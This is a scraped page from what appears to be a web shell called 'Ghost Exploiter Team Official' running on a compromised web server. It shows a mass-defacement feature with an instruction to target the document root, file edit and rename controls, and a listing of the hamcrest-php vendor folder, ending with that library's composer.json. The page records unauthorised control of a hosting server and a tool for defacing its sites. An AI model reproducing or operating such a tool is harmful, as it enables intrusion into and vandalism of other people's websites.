Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
hamcrest
/
hamcrest-php
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
generator
--
ren
hamcrest
--
ren
.gitattributes
0.13KB
edt
ren
.gitignore
0.048KB
edt
ren
CHANGES.txt
5.474KB
edt
ren
CONTRIBUTING.md
1.706KB
edt
ren
LICENSE.txt
1.447KB
edt
ren
README.md
10.703KB
edt
ren
composer.json
0.681KB
edt
ren
{ "name": "hamcrest/hamcrest-php", "type": "library", "description": "This is the PHP port of Hamcrest Matchers", "keywords": ["test"], "license": "BSD-3-Clause", "authors": [ ], "autoload": { "classmap": ["hamcrest"] }, "autoload-dev": { "classmap": ["tests", "generator"] }, "require": { "php": "^7.4|^8.0" }, "require-dev": { "phpunit/php-file-iterator": "^1.4 || ^2.0 || ^3.0", "phpunit/phpunit": "^4.8.36 || ^5.7 || ^6.5 || ^7.0 || ^8.0 || ^9.0" }, "replace": { "kodova/hamcrest-php": "*", "davedevelopment/hamcrest-php": "*", "cordoval/hamcrest-php": "*" }, "extra": { "branch-alias": { "dev-master": "2.1-dev" } } }